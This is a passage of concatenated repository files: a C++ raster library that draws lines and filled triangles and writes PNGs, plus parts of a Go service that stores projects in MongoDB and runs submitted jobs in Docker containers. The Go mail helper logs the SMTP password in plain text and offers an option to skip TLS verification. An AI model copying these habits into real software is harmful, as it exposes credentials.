<file_sep>#ifndef XLIB__IMAGE__HPP #define XLIB__IMAGE__HPP #include "type.hpp" #include "pixel.hpp" namespace xlib { class image { public: ~image(); void allocate( int32 width, int32 height ); inline void set( int32 x, int32 y, const pixel& data ) { _buffer[ _width * y + x ] = data; } inline const pixel& get( int32 x, int32 y ) const { return _buffer[ _width * y + x ]; } inline int32 width () const { return _width; } inline int32 height() const { return _height; } inline const pixel* buffer() const { return _buffer; } private: pixel* _buffer = nullptr; int32 _width = 0; int32 _height = 0; }; } #endif <file_sep>#ifndef XLIB__PIXEL__HPP #define XLIB__PIXEL__HPP #include "type.hpp" namespace xlib { struct pixel { uint8 red; uint8 green; uint8 blue; uint8 alpha; pixel() : red( 0 ), green( 0 ), blue( 0 ), alpha( 255 ) { } pixel( uint8 r, uint8 g, uint8 b, uint8 a = 255 ) : red( r ), green( g ), blue( b ), alpha( a ) { } }; } #endif <file_sep>#ifndef XLIB__SDK__HPP #define XLIB__SDK__HPP #include "visual/canvas.hpp" #include "visual/matrix.hpp" #include "visual/viewer.hpp" #include "visual/writer.hpp" #endif <file_sep>#ifndef XLIB__WRITER__HPP #define XLIB__WRITER__HPP #include "image.hpp" namespace xlib { class writer { public: static void png( const image& data, const char* file ); }; } #endif <file_sep>#include "canvas.hpp" #include "math.hpp" #include "writer.hpp" using namespace xlib; #define absolute math::absolute_int32 #define round math::round_float64 void swap_int32( int32& a, int32& b ) { if ( a != b ) { a ^= b; b ^= a; a ^= b; } } void canvas::size( int32 width, int32 height ) { _image.allocate( width, height ); } void canvas::plot( int32 x, int32 y, const pixel& color ) { if ( 0 <= x && x < _image.width() && 0 <= y && y < _image.height() ) { _image.set( x, _image.height() - y - 1, color ); } } void canvas::line( int32 x1, int32 y1, int32 x2, int32 y2, const pixel& color ) { #if 1 this->line_bresenham( x1, y1, x2, y2, color ); #else this->line_dda( x1, y1, x2, y2, color ); #endif } void canvas::fill( int32 x1, int32 y1, int32 x2, int32 y2, int32 x3, int32 y3, const pixel& color ) { if ( y1 > y2 ) { swap_int32( x1, x2 ); swap_int32( y1, y2 ); } if ( y1 > y3 ) { swap_int32( x1, x3 ); swap_int32( y1, y3 ); } if ( y2 > y3 ) { swap_int32( x2, x3 ); swap_int32( y2, y3 ); } if ( y1 == y2 ) { if ( x1 < x2 ) { this->fill_triangle_flat_bottom( x3, y3, x1, x2, y2, color ); } else { this->fill_triangle_flat_bottom( x3, y3, x2, x1, y2, color ); } } else if ( y2 == y3 ) { if ( x2 < x3 ) { this->fill_triangle_flat_top( x1, y1, x2, x3, y2, color ); } else { this->fill_triangle_flat_top( x1, y1, x3, x2, y2, color ); } } else { auto dx31 = ( float64 )( x3 - x1 ); auto dy21 = ( float64 )( y2 - y1 ); auto dy31 = ( float64 )( y3 - y1 ); auto x4 = ( int32 )( round( x1 + dy21 / dy31 * dx31 ) ); if ( x2 < x4 ) { this->fill_triangle_flat_bottom( x3, y3, x2, x4, y2, color ); this->fill_triangle_flat_top ( x1, y1, x2, x4, y2, color ); } else { this->fill_triangle_flat_bottom( x3, y3, x4, x2, y2, color ); this->fill_triangle_flat_top ( x1, y1, x4, x2, y2, color ); } } } void canvas::line_bresenham( int32 x1, int32 y1, int32 x2, int32 y2, const pixel& color ) { auto dx = x2 - x1; auto dy = y2 - y1; auto adx = absolute( dx ); auto ady = absolute( dy ); auto ddx = adx * 2; auto ddy = ady * 2; auto x = x1; auto y = y1; auto tx = x1 < x2 ? 1 : -1; auto ty = y1 < y2 ? 1 : -1; if ( adx < ady ) { auto e = -ady; for ( auto i = 0; i <= ady; ++i ) { this->plot( x, y, color ); y += ty; e += ddx; if ( e > 0 ) { x += tx; e -= ddy; } } } else { auto e = -adx; for ( auto i = 0; i <= adx; ++i ) { this->plot( x, y, color ); x += tx; e += ddy; if ( e > 0 ) { y += ty; e -= ddx; } } } } void canvas::line_dda( int32 x1, int32 y1, int32 x2, int32 y2, const pixel& color ) { // Digital Differential Analyzer int32 dx = x2 - x1; int32 dy = y2 - y1; int32 steps = 0; if ( absolute( dx ) < absolute( dy ) ) { steps = absolute( dy ); } else { steps = absolute( dx ); } auto ix = ( float64 )( dx ) / ( float64 )( steps ); auto iy = ( float64 )( dy ) / ( float64 )( steps ); auto x = ( float64 )( x1 ); auto y = ( float64 )( y1 ); for ( auto i = 0; i <= steps; ++i ) { this->plot( round( x ), round( y ), color ); x += ix; y += iy; } } void canvas::fill_horizontal( int32 x1, int32 x2, int32 y, const pixel& color ) { for ( auto x = x1; x <= x2; ++x ) { this->plot( x, y, color ); } } void canvas::fill_triangle_flat_bottom( int32 xt, int32 yt, int32 x1, int32 x2, int32 yb, const pixel& color ) { auto dx_min = ( float64 )( x1 - xt ); auto dx_max = ( float64 )( x2 - xt ); auto dy = ( float64 )( yb - yt ); auto x_min = ( float64 )( x1 ); auto x_max = ( float64 )( x2 ); auto ix_min = dx_min / dy; auto ix_max = dx_max / dy; for ( auto y = yb; y <= yt; ++y ) { this->fill_horizontal( round( x_min ), round( x_max ), y, color ); x_min += ix_min; x_max += ix_max; } } void canvas::fill_triangle_flat_top( int32 xb, int32 yb, int32 x1, int32 x2, int32 yt, const pixel& color ) { auto dx_min = ( float64 )( x1 - xb ); auto dx_max = ( float64 )( x2 - xb ); auto dy = ( float64 )( yt - yb ); auto x_min = ( float64 )( x1 ); auto x_max = ( float64 )( x2 ); auto ix_min = dx_min / dy; auto ix_max = dx_max / dy; for ( auto y = yt; y >= 0; --y ) { this->fill_horizontal( round( x_min ), round( x_max ), y, color ); x_min -= ix_min; x_max -= ix_max; } } <file_sep>#ifndef XLIB__VIEWER__HPP #define XLIB__VIEWER__HPP namespace xlib { class canvas; class viewer { public: static void show( const canvas& object ); }; } #endif <file_sep>#ifndef XLIB__CANVAS__HPP #define XLIB__CANVAS__HPP #include "image.hpp" namespace xlib { class canvas { public: void size( int32 width, int32 height ); void plot( int32 x, int32 y, const pixel& color ); void line( int32 x1, int32 y1, int32 x2, int32 y2, const pixel& color ); void fill( int32 x1, int32 y1, int32 x2, int32 y2, int32 x3, int32 y3, const pixel& color ); inline const image& data() const { return _image; } private: void line_bresenham( int32 x1, int32 y1, int32 x2, int32 y2, const pixel& color ); void line_dda ( int32 x1, int32 y1, int32 x2, int32 y2, const pixel& color ); void fill_horizontal( int32 x1, int32 x2, int32 y, const pixel& color ); void fill_triangle_flat_bottom( int32 xt, int32 yt, int32 x1, int32 x2, int32 yb, const pixel& color ); void fill_triangle_flat_top ( int32 xb, int32 yb, int32 x1, int32 x2, int32 yt, const pixel& color ); private: image _image; }; } #endif <file_sep>#include "viewer.hpp" #include "canvas.hpp" #include <QApplication> #include <QtWidgets> using namespace xlib; void viewer::show( const canvas& object ) { int qt_argc = 0; char** qt_argv = nullptr; QApplication application( qt_argc, qt_argv ); QMainWindow window; QScrollArea area; QLabel label; const image& data = object.data(); auto bits = ( const uchar* )( data.buffer() ); auto width = data.width(); auto height = data.height(); auto format = QImage::Format_RGBA8888; label.setPixmap( QPixmap::fromImage( QImage( bits, width, height, format ) ) ); area.setVisible( true ); area.setWidget( &label ); area.setWidgetResizable( true ); window.setCentralWidget( &area ); window.show(); QApplication::exec(); } <file_sep>#include "writer.hpp" #include <cstdlib> #include <cstring> #include <png.h> using namespace xlib; void writer::png( const image& data, const char* file ) { auto width = data.width(); auto height = data.height(); png_image png; memset( &png, 0, ( sizeof png ) ); png.version = PNG_IMAGE_VERSION; png.format = PNG_FORMAT_RGBA; png.width = width; png.height = height; auto bytes = static_cast< png_bytep >( malloc( PNG_IMAGE_SIZE( png ) ) ); for ( auto y = 0; y < height; ++y ) { for ( auto x = 0; x < width; ++x ) { auto i = width * y + x; const auto& p = data.get( x, y ); bytes[ 4 * i ] = p.red; bytes[ 4 * i + 1 ] = p.green; bytes[ 4 * i + 2 ] = p.blue; bytes[ 4 * i + 3 ] = p.alpha; } } png_image_write_to_file( &png, file, 0, bytes, 0, nullptr ); free( bytes ); } <file_sep>#include <xlib/sdk.hpp> int main( int argc, char* argv[] ) { xlib::pixel white( 0xff, 0xff, 0xff ); xlib::canvas canvas; canvas.size( 100, 100 ); { xlib::int32 x1 = 10; xlib::int32 y1 = 30; xlib::int32 x2 = 30; xlib::int32 y2 = 10; xlib::int32 x3 = 40; xlib::int32 y3 = 50; canvas.fill( x1, y1, x2, y2, x3, y3, white ); } { xlib::int32 x1 = 80; xlib::int32 y1 = 50; xlib::int32 x2 = 70; xlib::int32 y2 = 30; xlib::int32 x3 = 50; xlib::int32 y3 = 80; canvas.fill( x1, y1, x2, y2, x3, y3, white ); } xlib::writer::png( canvas.data(), "test_fill.png" ); xlib::viewer::show( canvas ); return 0; } <file_sep>#include <xlib/sdk.hpp> int main( int argc, char* argv[] ) { xlib::pixel red ( 0xff, 0x00, 0x00 ); xlib::pixel green( 0x00, 0xff, 0x00 ); xlib::pixel blue ( 0x00, 0x00, 0xff ); xlib::pixel white( 0xff, 0xff, 0xff ); xlib::canvas canvas; canvas.size( 23, 23 ); xlib::int32 ox = 11; xlib::int32 oy = 11; canvas.line( 0 + ox, 0 + oy, 10 + ox, 0 + oy, red ); canvas.line( 0 + ox, 0 + oy, -10 + ox, 0 + oy, red ); canvas.line( 0 + ox, 0 + oy, 0 + ox, 10 + oy, red ); canvas.line( 0 + ox, 0 + oy, 0 + ox, -10 + oy, red ); canvas.line( 0 + ox, 0 + oy, 10 + ox, 10 + oy, green ); canvas.line( 0 + ox, 0 + oy, -10 + ox, 10 + oy, green ); canvas.line( 0 + ox, 0 + oy, 10 + ox, -10 + oy, green ); canvas.line( 0 + ox, 0 + oy, -10 + ox, -10 + oy, green ); canvas.line( 0 + ox, 0 + oy, 10 + ox, 5 + oy, blue ); canvas.line( 0 + ox, 0 + oy, -10 + ox, 5 + oy, blue ); canvas.line( 0 + ox, 0 + oy, 10 + ox, -5 + oy, blue ); canvas.line( 0 + ox, 0 + oy, -10 + ox, -5 + oy, blue ); canvas.line( 0 + ox, 0 + oy, 5 + ox, 10 + oy, white ); canvas.line( 0 + ox, 0 + oy, -5 + ox, 10 + oy, white ); canvas.line( 0 + ox, 0 + oy, 5 + ox, -10 + oy, white ); canvas.line( 0 + ox, 0 + oy, -5 + ox, -10 + oy, white ); xlib::writer::png( canvas.data(), "test_line.png" ); xlib::viewer::show( canvas ); return 0; } <file_sep>#ifndef XLIB__TYPE__HPP #define XLIB__TYPE__HPP namespace xlib { typedef unsigned char uint8; typedef unsigned int uint32; typedef int int32; typedef float float32; typedef double float64; } #endif <file_sep>#include "image.hpp" using namespace xlib; image::~image() { if ( _buffer ) { delete[] _buffer; _buffer = nullptr; } } void image::allocate( int32 width, int32 height ) { if ( width == _width && height == _height ) { return; } if ( _buffer ) { delete[] _buffer; _buffer = nullptr; } _buffer = new pixel[ width * height ]; _width = width; _height = height; }
6fce2068432180a1772db916f62293fc4985506e
[ "Markdown", "CMake", "C++" ]
16
CMake
yuezijian/luna
6305ba2a91906d5964040519601ae3857fbf7cf1
21109700b284f2320b59c9c7f19ae9acc68fbd84
refs/heads/master
<file_sep>version: '3' services: mongo: image: mongo:3 restart: always ports: - 33017:27017 # for debug volumes: - ./test-data/mongo:/data/db - ./scripts:/scripts environment: - CONTAINER=docker command: [ "--storageEngine", "wiredTiger", "--auth"] manul: build: ./ ports: - 35000:35000 - 35001:35001 restart: always volumes: - ./test-data/data:/data - ./manul.yml.default:/etc/manul.yml environment: - CONTAINER=docker command: ["server", "-v"] <file_sep>package model import ( pb "github.com/argcv/go-argcvapis/app/manul/project" "github.com/argcv/manul/client/mongo" "gopkg.in/mgo.v2/bson" "time" ) type Project struct { // Required: project id Id bson.ObjectId `bson:"_id,omitempty" json:"id"` // Required: project name Name string `bson:"name,omitempty" json:"name,omitempty"` // Optional: description Desc string `bson:"desc,omitempty" json:"desc,omitempty"` Config *ProjectConfig `bson:"config,omitempty" json:"config,omitempty"` // Meta is NOT in using //Meta *structpb.Struct `bson:"meta,omitempty" json:"meta,omitempty"` CreateTime time.Time `bson:"create_time,omitempty" json:"create_time,omitempty"` UpdatedTime time.Time `bson:"updated_time,omitempty" json:"updated_time,omitempty"` CreatedBy string `bson:"created_by,omitempty" json:"created_by"` } func (p *Project) ToPbProject(rich bool) (pbProject *pb.Project) { pbProject = &pb.Project{ Id: p.Id.Hex(), Name: p.Name, Desc: p.Desc, } if rich { pbProject.Config = p.Config.ToPbProjectConfig(rich) } return } func FromPbProject(p *pb.Project) *Project { return &Project{ Id: mongo.SafeToObjectIdOrEmpty(p.Id), Name: p.Name, Desc: p.Desc, //Meta: p.Meta, } } <file_sep>package shell import ( "fmt" "github.com/argcv/manul/config" "github.com/spf13/viper" "gopkg.in/abiosoft/ishell.v2" ) //KeyDBMongoAddrs = "db.mongo.addrs" //KeyDBMongoDatabase = "db.mongo.db" //KeyDBMongoUser = "db.mongo.user" //KeyDBMongoPass = "db.mongo.pass" //KeyDBMongoTimeoutSec = "db.mongo.timeout_sec" func (e *Env) setupUpdateMongoDB(c *ishell.Context) { { // addrs var addrs []string addMongoAddr := func() { rtAddr := e.GetStringReplNonEmpty(c, "Type an address", "(e.g. localhost:27017) :") addrs = append(addrs, rtAddr) c.Printf("Current Addresses List: %v\n", addrs) } doContinue := true for doContinue { addMongoAddr() doContinue = e.ConfirmRepl(c, "Add more address? ", false) } c.Printf("Mongo Addresses: %v\n", addrs) viper.Set(config.KeyDBMongoAddrs, addrs) } // default database db := e.GetStringReplNonEmpty(c, "Type database for auth", "(e.g. admin ) :") viper.Set(config.KeyDBMongoDatabase, db) { // auth if e.ConfirmRepl(c, "Does this mongo has authorization? ", true) { viper.Set(config.KeyDBMongoPerformAuth, true) // yes source := e.GetStringRepl(c, fmt.Sprintf("Type database for auth, '%s' if it is empty", db), "(e.g. admin ) :") if len(source) > 0 { viper.Set(config.KeyDBMongoAuthDatabase, source) } else { viper.Set(config.KeyDBMongoAuthDatabase, nil) } user := e.GetStringRepl(c, "Type username for auth, defaults to admin", "username :") if len(user) > 0 { viper.Set(config.KeyDBMongoAuthUser, user) } else { viper.Set(config.KeyDBMongoAuthUser, "admin") } pass := e.GetStringReplNonEmpty(c, "Type password for auth", "password :") viper.Set(config.KeyDBMongoAuthPass, pass) mech := e.GetStringRepl(c, "Type authorization mechanism, defaults to 'MONGODB-CR'", "mech :") if len(mech) > 0 { viper.Set(config.KeyDBMongoAuthMechanism, mech) } else { viper.Set(config.KeyDBMongoAuthMechanism, nil) } } else { viper.Set(config.KeyDBMongoPerformAuth, false) } } } func (e *Env) AddSetup() { cmd := &ishell.Cmd{ Name: "setup", Help: "setup server environment (not for client side)", Func: func(c *ishell.Context) { if e.ConfirmRepl(c, "Update Mongo Credential ?", true) { e.setupUpdateMongoDB(c) } else { c.Println("Skipped..") } if e.ConfirmRepl(c, "Save Config ?", true) { viper.WriteConfig() c.Printf("Saved config file to %v\n", viper.ConfigFileUsed()) } else { c.Println("I did nothing and quitting....") } }, } e.Sh.AddCmd(cmd) } <file_sep>package config const ( // RPC Section KeyRpcBind = "rpc.bind" KeyRpcHost = "rpc.host" KeyRpcPort = "rpc.port" KeyRpcOptionMaxRecvMsgSizeMB = "rpc.option.max_recv_msg_size_mb" KeyRpcOptionMaxSendMsgSizeMB = "rpc.option.max_send_msg_size_mb" KeyHttpBind = "rpc.http.bind" KeyHttpHost = "rpc.http.host" KeyHttpPort = "rpc.http.port" // Database KeyDBMongoAddrs = "db.mongo.addrs" KeyDBMongoPerformAuth = "db.mongo.with_auth" KeyDBMongoAuthDatabase = "db.mongo.auth.db" KeyDBMongoAuthUser = "db.mongo.auth.user" KeyDBMongoAuthPass = "<PASSWORD>.auth.<PASSWORD>" KeyDBMongoAuthMechanism = "db.mongo.auth.mechanism" KeyDBMongoTimeoutSec = "db.mongo.timeout_sec" KeyDBMongoDatabase = "db.mongo.db" // Client KeyClientUserName = "client.user.name" KeyClientUserSecret = "client.user.secret" //KeyClientProject = "client.project" KeyFsWorkdir = "fs.workdir" KeyMailSMTPHost = "mail.smtp.host" KeyMailSMTPPort = "mail.smtp.port" KeyMailSMTPUserSender = "mail.smtp.sender" // Sender Name, Like: Sunlab Team KeyMailSMTPPerformAuth = "mail.smtp.with_auth" KeyMailSMTPUserName = "mail.smtp.auth.user" KeyMailSMTPPassword = "<PASSWORD>" KeyMailSMTPUserDefaultFrom = "mail.smtp.default_from" KeyMailSMTPInsecureSkipVerify = "mail.smtp.insecure_skip_verify" ) <file_sep>package main import ( "github.com/argcv/manul/model" "github.com/argcv/manul/version" "github.com/argcv/webeh/log" "github.com/pkg/errors" "github.com/spf13/cobra" "github.com/spf13/viper" "os" ) func main() { viper.SetConfigName("manul.project") viper.AddConfigPath(".") if conf := os.Getenv("MANUL_PROJECT_CFG"); conf != "" { viper.SetConfigFile(conf) } cmd := &cobra.Command{ PersistentPreRunE: func(cmd *cobra.Command, args []string) error { log.Infof("Manul Loader Started. Version: %s (%s) Built At: %v", version.Version, version.GitHash, version.BuildDate) if verbose, err := cmd.Flags().GetBool("verbose"); err == nil { if verbose { log.Verbose() log.Debug("verbose mode: ON") } } if conf, _ := cmd.Flags().GetString("config"); conf != "" { viper.SetConfigFile(conf) } err := viper.ReadInConfig() if _, ok := err.(viper.ConfigFileNotFoundError); !ok && err != nil { return err } if conf := viper.ConfigFileUsed(); conf != "" { log.Debugf("using config file: %s", conf) } else { return errors.New("configure file not found!!") } return nil }, RunE: func(cmd *cobra.Command, args []string) error { cfg, e := model.LoadProjectConfig("manul.project.yml") if e != nil { return e } bse := cfg.ToBashScriptsExecutor() bse.Id = "j1" log.Infof("Scripts: [%s]", bse.EncodedScript()) out, err := bse.Perform() log.Infof(".... out[\n%s\n] err::[%v]", string(out), err) //envs := viper.GetStringSlice("envs") // //log.Infof("[[[[[%v]]]]]", envs) // //outputDir, _ := cmd.Flags().GetString("out") // //log.Infof("output folder: %v", outputDir) // //os.MkdirAll(outputDir, 0700) // //bse := helpers.NewBashScriptsExecutor("123") // //bse.SetEnv(envs...) //for _, stage := range stages { // log.Info("stage:", stage) // script := viper.GetString(fmt.Sprintf("jobs.%s.script", stage)) // scripts := viper.GetStringSlice(fmt.Sprintf("jobs.%s.scripts", stage)) // // bse.AddEnv(envs...) // if len(script) > 0 { // scripts = append(scripts, script) // } // bse.AddScriptsInStage(stage, scripts...) //} //log.Infof("Scripts: [%s]", bse.EncodedScript()) //out, err := bse.Perform() //log.Infof(".... out[\n%s\n] err::[%v]", string(out), err) return nil }, } cmd.PersistentFlags().StringP("config", "c", "", "explicit assign a configuration file") cmd.PersistentFlags().BoolP("verbose", "v", false, "log verbose") cmd.PersistentFlags().StringP("out", "o", "/tmp", "output folder") log.Infof("start.[%v]", os.Args[0]) if err := cmd.Execute(); err != nil { log.Infof("%v: %v", os.Args[0], err) os.Exit(1) } } <file_sep>package service import ( "context" "errors" "fmt" "github.com/argcv/go-argcvapis/app/manul/file" pb "github.com/argcv/go-argcvapis/app/manul/job" "github.com/argcv/go-argcvapis/status/errcodes" "github.com/argcv/manul/client/mongo" "github.com/argcv/manul/model" "github.com/argcv/webeh/log" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/container" "github.com/docker/docker/client" "gopkg.in/mgo.v2/bson" "io/ioutil" "os" "path" "time" ) type JobServiceImpl struct { env *Env nRunningJobs int } /* TODO:Not implemented yet */ func (j *JobServiceImpl) ListJobs(context.Context, *pb.ListJobsRequest) (*pb.ListJobsResponse, error) { return nil, errors.New("implement me") } /* TODO:Not implemented yet */ func (j *JobServiceImpl) startJob(job *model.Job) { go func() { log.Infof("starting job... id: %v, project id: %v, user id:%v", job.Id, job.ProjectId, job.UserId) // if pj, err := j.env.ProjectService.findProject(job.ProjectId.Hex(), ""); err != nil { msg := fmt.Sprintf("invalid project: %v", err) log.Errorf(msg) j.updateJobLog(job.Id.Hex(), msg) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_FAILED) return } else { pjwkdir := j.env.SpawnProjectWorkdir().Goto(pj.Id.Hex()).Rebase() log.Infof("project folder: %v", pjwkdir.Path("/")) jbwkdir := j.env.SpawnJobWorkdir().Goto(job.Id.Hex()).Rebase() log.Infof("job dir: %v", jbwkdir.Path("/")) cfg, e := model.LoadProjectConfig(pjwkdir.Path("manul.project.yml")) if e != nil { msg := fmt.Sprintf("load configure file failed...: %v", e) log.Errorf(msg) j.updateJobLog(job.Id.Hex(), msg) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_FAILED) return } containerName := job.Id.Hex() // init client ctx := context.Background() cli, err := client.NewClientWithOpts(client.FromEnv, client.WithVersion("1.37"), func(c *client.Client) error { log.Warnf("Get Version: %v", c.ClientVersion()) return nil }) cli.ClientVersion() if err != nil { msg := fmt.Sprintf("get docker client failed!!! :%v", err) log.Errorf(msg) j.updateJobLog(job.Id.Hex(), msg) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_FAILED) return } image := cfg.Image if image == "" { // default name image = "fedora" } //reader, err := cli.ImagePull(ctx, "docker.io/library/alpine", types.ImagePullOptions{}) reader, err := cli.ImagePull(ctx, image, types.ImagePullOptions{}) if err != nil { msg := fmt.Sprintf("pull image failed...: %v", e) log.Errorf(msg) j.updateJobLog(job.Id.Hex(), msg) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_FAILED) return } pullMsg, err := ioutil.ReadAll(reader) if err != nil { msg := fmt.Sprintf("get pull image resp failed...: %v", e) log.Errorf(msg) j.updateJobLog(job.Id.Hex(), msg) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_FAILED) return } log.Infof("Pull Message: [%v]", string(pullMsg)) bse := cfg.ToBashScriptsExecutor() bse.Id = containerName workingdir := "/home/job" volumes := []string{ fmt.Sprintf("%s:%s:ro", pjwkdir.Path("/"), "/home/project"), fmt.Sprintf("%s:%s", jbwkdir.Path("/"), workingdir), } //for _, volume := range cfg.Volume { // volumes = append(volumes, fmt.Sprintf("%v/%v", basedir, volume)) //} resp, err := cli.ContainerCreate(ctx, &container.Config{ Image: cfg.Image, Entrypoint: []string{"bash", "-c"}, //Cmd: []string{"/proc/meminfo"}, //Cmd: []string{"ls -a /usr"}, Env: cfg.Env, Cmd: []string{bse.EncodedScript()}, Tty: true, Hostname: "bootcamp", Domainname: "local", WorkingDir: workingdir, }, &container.HostConfig{ //Binds: []string{ // //fmt.Sprintf("%v/test-data/data:/tmp:ro", basedir), // fmt.Sprintf("%v/test-data/data:/tmp:ro", basedir), //}, Binds: volumes, Resources: container.Resources{ Memory: int64(cfg.MaximumMemMb) * 1024 * 1024, //Memory: 1024 * 1024 * 5, // 100 MB //KernelMemory: 1024 * 1024 * 1, // 100 MB //Memory int64 // Memory limit (in bytes) }, }, nil, containerName) if err != nil { msg := fmt.Sprintf("container create failed...: %v", e) log.Errorf(msg) j.updateJobLog(job.Id.Hex(), msg) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_FAILED) return } j.updateJobLog(job.Id.Hex(), fmt.Sprintf("job started at: %v", time.Now())) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_PENDING) log.Infof("resp.id: %v", resp.ID) if err := cli.ContainerStart(ctx, resp.ID, types.ContainerStartOptions{}); err != nil { msg := fmt.Sprintf("container start failed...: %v", e) log.Errorf(msg) j.updateJobLog(job.Id.Hex(), msg) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_FAILED) return } statusCh, errCh := cli.ContainerWait(ctx, resp.ID, container.WaitConditionNotRunning) select { case err := <-errCh: if err != nil { panic(err) } case st := <-statusCh: log.Infof("Wait... %v, %v", st.StatusCode, st.Error) } logs, err := cli.ContainerLogs(ctx, resp.ID, types.ContainerLogsOptions{ShowStdout: true}) if err != nil { panic(err) } logsMsg, err := ioutil.ReadAll(logs) if err != nil { panic(err) } log.Infof("Log: [%v]", string(logsMsg)) var expire = 1 * time.Second err = cli.ContainerStop(ctx, resp.ID, &expire) if err != nil { log.Errorf("Error: %v", err) } err = cli.ContainerRemove(ctx, resp.ID, types.ContainerRemoveOptions{ RemoveVolumes: true, Force: true, }) if err != nil { log.Errorf("remove failed..: %v", err) } log.Infof("Done.") j.updateJobLog(job.Id.Hex(), string(logsMsg)) j.updateJobProgress(job.Id.Hex(), pb.JobProgress_OK) return } }() } func (j *JobServiceImpl) updateJobLog(id string, log string) error { mc := j.env.SpawnMgoCli() defer mc.Close() q := bson.M{} u := bson.M{} if jid, e := mongo.SafeToObjectId(id); e == nil { q["_id"] = jid u = mongo.SetOperator(bson.M{ "log": log, }) return mc.Update(DbJobColl, q, u) } else { return e } } func (j *JobServiceImpl) updateJobProgress(id string, progress pb.JobProgress) error { mc := j.env.SpawnMgoCli() defer mc.Close() q := bson.M{} u := bson.M{} if jid, e := mongo.SafeToObjectId(id); e == nil { q["_id"] = jid u = mongo.SetOperator(bson.M{ "progress": progress, }) return mc.Update(DbJobColl, q, u) } else { return e } } func (j *JobServiceImpl) updateJob(job *model.Job) error { mc := j.env.SpawnMgoCli() defer mc.Close() q := bson.M{} q["_id"] = job.Id return mc.Update(DbJobColl, q, job) } func (j *JobServiceImpl) findJob(id string) (job *model.Job, err error) { mc := j.env.SpawnMgoCli() defer mc.Close() q := bson.M{} if oid, e := mongo.SafeToObjectId(id); e != nil { return nil, e } else { q["_id"] = oid } log.Infof("query: %v", q) err = mc.One(DbJobColl, q, &job) return } func (j *JobServiceImpl) createJob(uid, pid bson.ObjectId, files *file.Files) (job *model.Job, err error) { mc := j.env.SpawnMgoCli() defer mc.Close() // create job job = model.NewJob(uid, pid) // write files base := j.env.SpawnJobWorkdir().Goto(job.Id.Hex()).Rebase() // write files here for _, f := range files.Data { var perm os.FileMode = 0600 if f.Meta != nil && f.Meta.Fields != nil { if cp, ok := f.Meta.Fields["perm"]; ok { fcp := cp.GetNumberValue() log.Debugf("file: [%v] => [%v] , perm: %v", f.Path, f.Name, fcp) if fcp > 0 && fcp <= 0777 { perm = os.FileMode(fcp) } } } base.WriteFile(path.Join(f.Path, f.Name), f.Data, perm) } if err = mc.Insert(DbJobColl, job); err != nil { return } // it is used to Start a job j.startJob(job) return } func (j *JobServiceImpl) CreateJob(ctx context.Context, req *pb.CreateJobRequest) (ret *pb.CreateJobResponse, e error) { log.Infof("Create Job...") if ucli, err := j.env.ParseAuthInfo(ctx, req.Auth); err != nil || (ucli.UserType != model.UserType_ADMIN && ucli.UserType != model.UserType_USER) { st := model.Status{ Code: errcodes.Code_PERMISSION_DENIED, Message: fmt.Sprintf("invalid auth: %v", err), } ret = &pb.CreateJobResponse{ Success: false, Result: &pb.CreateJobResponse_Error{ Error: st.ToPbStatus(), }, } return } else if req.Files == nil { st := model.Status{ Code: errcodes.Code_INVALID_ARGUMENT, Message: "missing files", } ret = &pb.CreateJobResponse{ Success: false, Result: &pb.CreateJobResponse_Error{ Error: st.ToPbStatus(), }, } return } else { if p, err := j.env.ProjectService.findProject(req.ProjectId, ""); err != nil { st := model.Status{ Code: errcodes.Code_INVALID_ARGUMENT, Message: fmt.Sprintf("invalid project id: %v", err), } ret = &pb.CreateJobResponse{ Success: false, Result: &pb.CreateJobResponse_Error{ Error: st.ToPbStatus(), }, } return } else if j, err := j.createJob(ucli.Id, p.Id, req.Files); err != nil { st := model.Status{ Code: errcodes.Code_INTERNAL, Message: fmt.Sprintf("invalid project id: %v", err), } ret = &pb.CreateJobResponse{ Success: false, Result: &pb.CreateJobResponse_Error{ Error: st.ToPbStatus(), }, } return } else { ret = &pb.CreateJobResponse{ Success: true, Result: &pb.CreateJobResponse_Job{ Job: j.ToPbJob(), }, } return } } } func (j *JobServiceImpl) GetJob(ctx context.Context, req *pb.GetJobRequest) (ret *pb.GetJobResponse, e error) { log.Infof("Get Job...") if ucli, err := j.env.ParseAuthInfo(ctx, req.Auth); err != nil || (ucli.UserType != model.UserType_ADMIN && ucli.UserType != model.UserType_USER) { st := model.Status{ Code: errcodes.Code_PERMISSION_DENIED, Message: fmt.Sprintf("invalid auth: %v", err), } ret = &pb.GetJobResponse{ Success: false, Result: &pb.GetJobResponse_Error{ Error: st.ToPbStatus(), }, } return } else if job, err := j.findJob(req.Id); err != nil { st := model.Status{ Code: errcodes.Code_NOT_FOUND, Message: fmt.Sprintf("job not found: %v", e), } ret = &pb.GetJobResponse{ Success: false, Result: &pb.GetJobResponse_Error{ Error: st.ToPbStatus(), }, } return } else { ret = &pb.GetJobResponse{ Success: true, Result: &pb.GetJobResponse_Job{ Job: job.ToPbJob(), }, } return } } /* TODO:Not implemented yet */ func (j *JobServiceImpl) CancelJob(context.Context, *pb.CancelJobRequest) (*pb.CancelJobResponse, error) { return nil, errors.New("implement me") } <file_sep>package mail import ( "crypto/tls" "github.com/argcv/manul/config" "gopkg.in/gomail.v2" "sync" "time" "github.com/argcv/webeh/log" ) // for future update, // please refer to this example: // https://github.com/go-gomail/gomail/blob/master/example_test.go#L1 type SMTPSession struct { Dialer *gomail.Dialer Message *gomail.Message Config *config.SMTPConfig } var ( defaultSMTPConfig *config.SMTPConfig defaultSMTPConfigIsInitialized sync.Once ) func NewSMTPSession() (s *SMTPSession, err error) { defaultSMTPConfigIsInitialized.Do(func() { defaultSMTPConfig = config.GetSMTPConfig() }) m := gomail.NewMessage() log.Infof("Username: %v", defaultSMTPConfig.GetUsername()) log.Infof("Password: %v", defaultSMTPConfig.GetPassword()) dialer := gomail.NewDialer( defaultSMTPConfig.Host, defaultSMTPConfig.Port, defaultSMTPConfig.GetUsername(), defaultSMTPConfig.GetPassword()) if defaultSMTPConfig.InsecureSkipVerify { dialer.TLSConfig = &tls.Config{InsecureSkipVerify: true} } s = &SMTPSession{ Message: m, Dialer: dialer, Config: defaultSMTPConfig, } return } func (s *SMTPSession) DefaultFrom() *SMTPSession { var names []string if s.Config.Sender != "" { names 